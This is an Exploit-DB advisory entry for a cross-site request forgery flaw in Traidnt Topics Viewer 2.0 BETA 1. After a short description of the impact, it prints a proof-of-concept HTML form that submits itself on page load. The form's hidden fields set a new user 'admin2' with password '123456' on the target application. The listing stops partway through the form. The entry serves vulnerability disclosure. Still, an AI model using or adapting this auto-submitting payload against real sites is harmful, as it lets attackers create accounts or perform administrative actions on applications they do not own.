Traidnt Topics Viewer 2.0 - 'main.php' Cross Site Request Forgery Vulnerability

ID EDB-ID:36892
Type exploitdb
Reporter Green Hornet
Modified 2012-02-29T00:00:00


Traidnt Topics Viewer 2.0 'main.php' Cross Site Request Forgery Vulnerability. Webapps exploit for php platform


Traidnt Topics Viewer is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.

Traidnt Topics Viewer 2.0 BETA 1 is vulnerable; other versions may also be affected. 

<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="">
<input type="hidden" name="u_name" value="admin2"/>
<input type="hidden" name="u_m_pass" value="123456"/>
<input type="hidden" name="u_email" value=""/>